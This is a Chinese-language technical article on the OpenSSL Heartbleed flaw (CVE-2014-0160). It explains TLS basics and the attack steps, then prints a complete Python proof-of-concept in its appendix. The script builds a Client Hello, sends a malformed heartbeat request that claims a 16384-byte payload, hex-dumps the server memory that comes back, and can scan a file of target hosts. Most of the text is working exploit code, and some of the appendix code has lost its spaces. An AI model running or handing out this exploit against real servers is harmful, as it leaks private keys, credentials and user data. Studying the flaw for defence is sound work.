2014年4月7日OpenSSL发布了安全公告,在OpenSSL1.0.1版本中存在严重漏洞(CVE-2014-0160)。OpenSSL Heartbleed模块存在一个BUG,问题存在于ssl/dl_both.c文件中的心跳部分,当攻击者构造一个特殊的数据包,满足用户心跳包中无法提供足够多的数据会导致memcpy函数把SSLv3记录之后的数据直接输出,该漏洞导致攻击者可以远程读取存在漏洞版本的OpenSSL服务器内存中多达64K的数据。
1、漏洞说明
OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. 1.0.2 will be fixed in 1.0.2-beta2.
参考:
https://www.openssl.org/news/secadv_20140407.txt
http://heartbleed.com/
http://s3.jspenguin.org/ssltest.py
2.TLS/SSL 简介
TLS 和 SSL 是两个密切相关的协议, 均用于保证两个主机之间通信数据的机密性与完整性。
TLS或 SSL 可为已存在的应用层协议(例如. HTTP, LDAP, FTP, SMTP 及其他),添加一个安全层。它同样可以用于创建VPN解决方案(例如, OpenVPN).
SSL 协议于1994年由Netscape开发。1996年,SSL 3.0 (最后版本)被发布。IETF 基于此协议进行了开发,取名为TLS。1999年,IETF在RFC2246中发布TLS 1.0。
TLS 或 SSL 协议,由多层构成. 最接近它的上层协议是可信传输协议(例如: TCP). 它可用于封装较高层次的协议。
协议握手 – 允许服务器与客户间相互验证, 协商加密算法,交换密钥.
协议警告 – 警告讯息传达警告的严重程度和警报的描述(错误,关闭,握手障碍等). 导致连接立即终止的一些致命结果,都会产生警告。警告信息会在当前连接状态下,被加密和压缩。
协议应用 – 位于传输层协议(TCP/IP)之上, 例如: HTTP, TELNET, FTP, SMTP.
为了在客户端与服务端建立一个安全会话,TLS/SSL需要完成几步验证,并创建密钥。握手过程,交互信息如下:
3.攻击流程
基于POC程序源代码(见附录A),介绍一下CVE-2014-0160漏洞的攻击思路:
1. 建立socket连接
2. 发送TLS/SSL Client Hello请求
3. 发送畸形heartbleed数据
4. 检测漏洞存在
建立socket连接
def ssltest(target, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port))
多数情况下, 默认443提供HTTPS服务.
发送TLS/SSL Client Hello请求
tcp socket 建立后, 发送SSL/TLS Client Hello请求,
s.send(h2bin(hello))
Client Hello请求数据如下所示:
# ----------TLSv1---[Client Hello]-------------- #Secure Sockets Layer # TLSv1.1 Record Layer: Handshake Protocol: Client Hello # Content Type: Handshake (22) # Version: TLS 1.1 (0x0302) # Length: 220 # Handshake Protocol: Client Hello # Handshake Type: Client Hello (1) # Length: 216 # Version: TLS 1.1 (0x0302) # Random # Session ID Length: 0 # Cipher Suites Length: 102 # Cipher Suites (51 suites) # Cipher Suite: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) # Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) # Cipher Suite: TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA (0xc022) # Cipher Suite: TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA (0xc021) # Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) # Cipher Suite: TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038) # Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088) # Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087) # Cipher Suite: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA (0xc00f) # Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA (0xc005) # Cipher Suite: TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) # Cipher Suite: TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084) # Cipher Suite: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012) # Cipher Suite: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008) # Cipher Suite: TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA (0xc01c) # Cipher Suite: TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA (0xc01b) # Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x0016) # Cipher Suite: TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) # Cipher Suite: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA (0xc00d) # Cipher Suite: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc003) # Cipher Suite: TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) # Cipher Suite: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) # Cipher Suite: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009) # Cipher Suite: TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA (0xc01f) # Cipher Suite: TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA (0xc01e) # Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) # Cipher Suite: TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032) # Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA (0x009a) # Cipher Suite: TLS_DHE_DSS_WITH_SEED_CBC_SHA (0x0099) # Cipher Suite: TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045) # Cipher Suite: TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044) # Cipher Suite: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA (0xc00e) # Cipher Suite: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA (0xc004) # Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA (0x002f) # Cipher Suite: TLS_RSA_WITH_SEED_CBC_SHA (0x0096) # Cipher Suite: TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041) # Cipher Suite: TLS_ECDHE_RSA_WITH_RC4_128_SHA (0xc011) # Cipher Suite: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (0xc007) # Cipher Suite: TLS_ECDH_RSA_WITH_RC4_128_SHA (0xc00c) # Cipher Suite: TLS_ECDH_ECDSA_WITH_RC4_128_SHA (0xc002) # Cipher Suite: TLS_RSA_WITH_RC4_128_SHA (0x0005) # Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004) # Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA (0x0015) # Cipher Suite: TLS_DHE_DSS_WITH_DES_CBC_SHA (0x0012) # Cipher Suite: TLS_RSA_WITH_DES_CBC_SHA (0x0009) # Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA (0x0014) # Cipher Suite: TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA (0x0011) # Cipher Suite: TLS_RSA_EXPORT_WITH_DES40_CBC_SHA (0x0008) # Cipher Suite: TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x0006) # Cipher Suite: TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x0003) # Cipher Suite: TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff) # Compression Methods Length: 1 # Compression Methods (1 method) # Extensions Length: 73 # Extension: ec_point_formats # Extension: elliptic_curves # Extension: SessionTicket TLS # Extension: Heartbeat hello = [ # TLSv1.1 Record Layer : Handshake Protocol: Client Hello "16" # Content Type: Handshake (22) "03 02" # Version: TLS 1.1 (0x0302) "00 dc" # Length: 220 # Handshake Protocol: Client Hello "01" # Handshake Type: Client Hello (1) "00 00 d8" # Length (216) "03 02" # Version: TLS 1.1 (0x0302) # Random "53 43 5b 90" # gmt_unix_time "9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de" # random_bytes "00" # Session ID Length: 0 "00 66" # Cipher Suite Length: 102 # Cipher Suites "c0 14" "c0 0a" "c0 22" "c0 21" "00 39" "00 38" "00 88" "00 87" "c0 0f" "c0 05" "00 35" "00 84" "c0 12" "c0 08" "c0 1c" "c0 1b" "00 16" "00 13" "c0 0d" "c0 03" "00 0a" "c0 13" "c0 09" "c0 1f" "c0 1e" "00 33" "00 32" "00 9a" "00 99" "00 45" "00 44" "c0 0e" "c0 04" "00 2f" "00 96" "00 41" "c0 11" "c0 07" "c0 0c" "c0 02" "00 05" "00 04" "00 15" "00 12" "00 09" "00 14" "00 11" "00 08" "00 06" "00 03" "00 ff" "01" # Compression Methods # Compression Methods (1 method) "00" # Compression Method: null "00 49" # Extension Length: 73 "00 0b" # Type: ec_point_formats "00 04" # Length: 4 "03" # EC point formats length: 3 # Elliptic curves point formats "00" # EC point format: uncompressed (0) "01" # EC point format: ansix962_compressed_prime "02" # EC point format: ansix962_compressed_char2 # Extension: elliptic_curves "00 0a" "00 34" "00 32" "00 0e" "00 0d" "00 19" "00 0b" "00 0c" "00 18" "00 09" "00 0a" "00 16" "00 17" "00 08" "00 06" "00 07" "00 14" "00 15" "00 04" "00 05" "00 12" "00 13" "00 01" "00 02" "00 03" "00 0f" "00 10" "00 11" "00 23 00 00" # Extension: SeesionTicket TLS "00 0f 00 01 01" # Extension: Heartbeat ]
发送Client Hello后,等待服务端响应, 检测TLS/SSLClient Hello会话是否成功.
while True: typ, ver, pay = recvmsg(s) if typ == None: return # Look for server hello done message. # typ == 22 ----> Handshake # if typ == 22 and ord(pay[0]) == 0x0E: break
此处服务器返回两次数据. Frame 10返回, 主要用于进一步获取 Server Hello 信息. Frame 11 为 TLS/SSL 的Server Hello 响应.
def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) print 'read: ', r if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) hexdump(rdata) return rdata def recvmsg(s): hdr = recvall(s, 5) # recvall(s, 5, timeout=5) # 用于进一步确认 Server Hello的信息. if hdr is None: return None, None, None # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] # Python ---- [big-edition] + integer + integer + integer # [Content Type] + [Version] + [Length] typ, ver, ln = struct.unpack('>BHH', hdr) # 返回 Server Hello 数据内容 pay = recvall(s, ln, 10) if pay is None: return None, None, None return typ, ver, pay
Server Hello 消息返回, 说明TTL/SSL 会话成功建立, 此过程伴随有Certificate, Server Key Exchange, Server Hello Done.
发送畸形heartbleed数据
Server Hello成功返回后, 向服务器发送畸形heartbleed 请求. 如果服务器响应, 会伴随有 Encrypted Heartbeats Message,也就是泄露的内存数据.
s.send(h2bin(hb)) # Malformed Packet
Heartbleed 包数据如下:
# ---------TLSv1---[Heartbeat Request]------------ hb = [ # TLSv1.1 Record Layer: Heartbeat Request "18" # Content Type: Heartbeat (24) ---- (0x18) "03 02" # Version: TLS 1.1 (0x0302) "00 03" # Heartbeat Message: "01" # Type: Request (1) (0x01) "40 00" # Payload Length: (16384) (0x4000) ]
检测漏洞是否存在
畸形数据包发送完成后, 检测漏洞是否存在
while True: print "[+] receive data..." typ, ver, pay = recvmsg(s) if typ is None: print "[-] %s |NOT VULNERABLE" % target return False # TLSv1.1 Record Layer: Encrypted Heartbeat # Content Type: Heartbeat (24) # Version: TLS 1.1 (0x0302) # Length: 19 # Encrypted Heartbeat Message if typ == 24: # Content Type: Heartbeat (24) if len(pay) > 3: # 无数据返回. print "[*] %s |VULNERABLE" % target else: print "[-] %s |NOT VULNERABLE" % target return True if typ == 21: print "[-] %s |NOT VULNERABLE" % target return False
泄露的部分数据如下图所示.
修复建议:
请使用无漏洞版本
附录A – POC
#!/usr/bin/python #Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) #The author disclaims copyright to this source code. #Modified for simplified checking by Yonathan Klijnsma #Modified for multiple hosts by hap.ddup #http://seclists.org/fulldisclosure/2014/Apr/94 #http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/ #------------------------------------------------ # #OpenSSL versions 1.0.1 -- 1.0.1f are vulnerable # #------------------------------------------------ #importsys importstruct importsocket importtime importselect #importre fromoptparse import OptionParser #target= None #options= OptionParser(usage='%prog server [options]', description='Test for SSLheartbeat vulnerability (CVE-2014-0160)') #options.add_option('-p','--port', type='int', default=443, help='TCP port to test (default: 443)') #options.add_option('-d','--dest', type='string',dest='host', help='HOST to test') #options.add_option('-f','--file', type='string',dest='filename', help='Hosts in the FILE to test ') defh2bin(x): return x.replace(' ', '').replace('\n','').decode('hex') #----------TLSv1---[Client Hello]-------------- #SecureSockets Layer # TLSv1.1 Record Layer: Handshake Protocol:Client Hello # Content Type: Handshake (22) # Version: TLS 1.1 (0x0302) # Length: 220 # Handshake Protocol: Client Hello # Handshake Type: Client Hello (1) # Length: 216 # Version: TLS 1.1 (0x0302) # Random # Session ID Length: 0 # Cipher Suites Length: 102 # Cipher Suites (51 suites) # Cipher Suite:TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) # Cipher Suite:TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) # Cipher Suite:TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA (0xc022) # Cipher Suite:TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA (0xc021) # Cipher Suite:TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039) # Cipher Suite:TLS_DHE_DSS_WITH_AES_256_CBC_SHA (0x0038) # Cipher Suite:TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0088) # Cipher Suite:TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA (0x0087) # Cipher Suite:TLS_ECDH_RSA_WITH_AES_256_CBC_SHA (0xc00f) # Cipher Suite:TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA (0xc005) # Cipher Suite:TLS_RSA_WITH_AES_256_CBC_SHA (0x0035) # Cipher Suite:TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (0x0084) # Cipher Suite:TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012) # Cipher Suite:TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008) # Cipher Suite:TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA (0xc01c) # Cipher Suite:TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA (0xc01b) # Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA(0x0016) # Cipher Suite:TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA (0x0013) # Cipher Suite:TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA (0xc00d) # Cipher Suite:TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc003) # Cipher Suite:TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a) # Cipher Suite:TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) # Cipher Suite:TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009) # Cipher Suite:TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA (0xc01f) # Cipher Suite:TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA (0xc01e) # Cipher Suite:TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033) # Cipher Suite:TLS_DHE_DSS_WITH_AES_128_CBC_SHA (0x0032) # Cipher Suite:TLS_DHE_RSA_WITH_SEED_CBC_SHA (0x009a) # Cipher Suite:TLS_DHE_DSS_WITH_SEED_CBC_SHA (0x0099) # Cipher Suite:TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0045) # Cipher Suite:TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA (0x0044) # Cipher Suite:TLS_ECDH_RSA_WITH_AES_128_CBC_SHA (0xc00e) # Cipher Suite:TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA (0xc004) # Cipher Suite: TLS_RSA_WITH_AES_128_CBC_SHA(0x002f) # Cipher Suite:TLS_RSA_WITH_SEED_CBC_SHA (0x0096) # Cipher Suite:TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (0x0041) # Cipher Suite:TLS_ECDHE_RSA_WITH_RC4_128_SHA (0xc011) # Cipher Suite:TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (0xc007) # Cipher Suite:TLS_ECDH_RSA_WITH_RC4_128_SHA (0xc00c) # Cipher Suite:TLS_ECDH_ECDSA_WITH_RC4_128_SHA (0xc002) # Cipher Suite:TLS_RSA_WITH_RC4_128_SHA (0x0005) # Cipher Suite:TLS_RSA_WITH_RC4_128_MD5 (0x0004) # Cipher Suite:TLS_DHE_RSA_WITH_DES_CBC_SHA (0x0015) # Cipher Suite:TLS_DHE_DSS_WITH_DES_CBC_SHA (0x0012) # Cipher Suite:TLS_RSA_WITH_DES_CBC_SHA (0x0009) # Cipher Suite:TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA (0x0014) # Cipher Suite:TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA (0x0011) # Cipher Suite:TLS_RSA_EXPORT_WITH_DES40_CBC_SHA (0x0008) # Cipher Suite:TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 (0x0006) # Cipher Suite:TLS_RSA_EXPORT_WITH_RC4_40_MD5 (0x0003) # Cipher Suite:TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00ff) # Compression Methods Length: 1 # Compression Methods (1 method) # Extensions Length: 73 # Extension: ec_point_formats # Extension: elliptic_curves # Extension: SessionTicket TLS # Extension: Heartbeat hello= [ # TLSv1.1 Record Layer : HandshakeProtocol: Client Hello "16" # Content Type: Handshake (22) "0302" # Version: TLS 1.1 (0x0302) "00dc" # Length: 220 # Handshake Protocol: Client Hello "01" # Handshake Type: Client Hello (1) "0000 d8" # Length (216) "0302" # Version: TLS 1.1 (0x0302) # Random "5343 5b 90" # gmt_unix_time "9d9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd39 04 cc 16 0a 85 03 90 9f 77 04 33 d4de" # random_bytes "00" # Session ID Length: 0 "0066" # Cipher Suite Length: 102 # Cipher Suites "c014" "c00a" "c022" "c021" "0039" "0038" "0088" "0087" "c00f" "c005" "0035" "0084" "c012" "c008" "c01c" "c01b" "0016" "0013" "c00d" "c003" "000a" "c013" "c009" "c01f" "c01e" "0033" "0032" "009a" "0099" "0045" "0044" "c00e" "c004" "002f" "0096" "0041" "c011" "c007" "c00c" "c002" "0005" "0004" "0015" "0012" "0009" "0014" "0011" "0008" "0006" "0003" "00ff" "01" #Compression Methods # Compression Methods (1 method) "00" # Compression Method: null "0049" # Extension Length: 73 "000b" # Type: ec_point_formats "0004" # Length: 4 "03" # EC point formats length: 3 # Elliptic curves point formats "00" # EC point format: uncompressed (0) "01" # EC point format:ansix962_compressed_prime "02" # EC point format:ansix962_compressed_char2 # Extension: elliptic_curves "000a" "0034" "0032" "000e" "000d" "0019" "000b" "000c" "0018" "0009" "000a" "0016" "0017" "0008" "0006" "0007" "0014" "0015" "0004" "0005" "0012" "0013" "0001" "0002" "0003" "000f" "0010" "0011" "0023 00 00" # Extension:SeesionTicket TLS "000f 00 01 01" # Extension:Heartbeat ] #---------TLSv1---[Heartbeat Request]------------ hb= [ # TLSv1.1 Record Layer: HeartbeatRequest "18" # Content Type: Heartbeat (24) ----(0x18) "0302" # Version: TLS 1.1 (0x0302) "0003" # Heartbeat Message: "01" # Type: Request (1) (0x01) "4000" # Payload Length: (16384) (0x4000) ] hello= hello[0].replace("","").replace("\n","") hb= hb[0].replace("","").replace("\n","") defhexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for cin lin) pdat = ''.join((c if 32 <= ord(c)<= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print defrecvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) print 'read: ', r if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) hexdump(rdata) return rdata defrecvmsg(s): hdr = recvall(s, 5) # recvall(s, 5, timeout=5) if hdr is None: return None, None, None # C ---- [big-edition] + [unsigned char] + [unsigned short] + [unsigned short] # Python ---- [big-edition] + integer +integer + integer # [Content Type] + [Version] + [Length] typ, ver, ln = struct.unpack('>BHH',hdr) pay = recvall(s, ln, 10) if pay is None: return None, None, None return typ, ver, pay defhit_hb(s, target): #global target s.send(h2bin(hb)) while True: print "[+] receive data..." typ, ver, pay = recvmsg(s) if typ is None: print "[-] %s |NOTVULNERABLE" % target return False # TLSv1.1 Record Layer: EncryptedHeartbeat # Content Type: Heartbeat (24) # Version: TLS 1.1 (0x0302) # Length: 19 # Encrypted Heartbeat Message if typ == 24: if len(pay) > 3: print "[*] %s |VULNERABLE" %target else: print "[-] %s |NOTVULNERABLE" % target return True if typ == 21: print "[-] %s |NOTVULNERABLE" % target return False defssltest(target, port): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) s.send(h2bin(hello)) while True: typ, ver, pay = recvmsg(s) if typ == None: return # Look for server hello done message. # typ == 22 ----> Handshake # if typ == 22 and ord(pay[0]) == 0x0E: break #sys.stdout.flush() print "[+] send payload: %s" % hb s.send(h2bin(hb)) # Malformed Packet return hit_hb(s, target) # ------------- ********* defmain(): #global target options = OptionParser(usage='%prog server[options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port',type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-d', '--dest',dest='host', help='HOST to test') options.add_option('-f', '--file',dest='filename', help='Hosts in the FILE to test ') (opts, args) = options.parse_args() #print (opts, args) #if len(args) < 1: # options.print_help() # return if opts.host: ssltest(opts.host, opts.port) return if opts.filename: hostfile=open(opts.filename,'r').readlines() for host in hostfile: host = host.strip() if len(host) > 3: # x.x ssltest(host, opts.port) return if len(args) < 1: options.print_help() return if__name__ == '__main__': main()